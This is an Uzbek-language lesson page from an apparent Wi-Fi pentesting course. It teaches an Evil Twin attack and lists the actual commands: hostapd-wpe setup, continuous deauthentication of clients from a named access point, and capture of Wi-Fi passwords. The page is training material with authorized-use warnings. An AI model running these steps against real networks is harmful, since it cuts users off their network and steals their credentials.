Modulga qaytish
O'quv darsi / Wi-Fi Pentesting (WPA/WPA2)

Evil Twin (Soxta AP) hujumi

Mijozlarni aldab, parollarini qo'lga kiritishning eng kuchli usuli — asl tarmoq nomi bilan soxta Access Point yaratish. Bu mashq faqat o'z mijozlaringiz va o'z tarmog'ingiz uchun bajariladi.

30 daq.ilg'or8 komanda6/8
Dars holati
Davom etmoqda
Amaliy komandalar0/8
Maqsadlar
  • Adapterlarni qayta taqsimlash
  • hostapd-wpe bilan soxta AP
  • Asl mijozlarni deauth qilib soxta tarmoqqa olib o'tish
Faqat ruxsat etilgan muhitda mashq qiling

Bu darsdagi buyruqlar o'quv simulyatori va o'zingizga tegishli lablar uchun. Begona tizimlarni skanlash yoki sinash qonuniy javobgarlikka olib keladi.

O'qish

hostapd-wpe konfiguratsiyasi

interface=wlan1, ssid=Alsamos, channel=5, wpa=2, wpa_passphrase=12345678. Konfig faylni /etc/hostapd-wpe/hostapd-wpe.conf ga yozing.

Hujumni boshlash

hostapd-wpe ishga tushgach, yangi terminalda asl AP ga deauth yuboring. Mijozlar soxta tarmoqqa ulanishga urinadi va parol terminalda [WPE] Password captured: shaklida ko'rinadi.

To'xtatish

killall hostapd-wpe, airmon-ng stop wlan0mon, systemctl restart NetworkManager — tarmoq holatini tiklash uchun.

Komandalar

Run tugmasi buyruqni o'ngdagi simulyatorga yuboradi; Copy esa real Kali terminalingiz uchun.

0%
$sudo apt install hostapd-wpe -y
$sudo airmon-ng stop wlan0mon
$sudo ip link set wlan1 down && sudo iw dev wlan1 set type managed && sudo ip link set wlan1 up
$sudo hostapd-wpe /etc/hostapd-wpe/hostapd-wpe.conf
$sudo airmon-ng start wlan0
$sudo aireplay-ng -0 0 -a 7C:8B:CA:B8:B3:B4 wlan0mon
$sudo killall hostapd-wpe
$sudo systemctl restart NetworkManager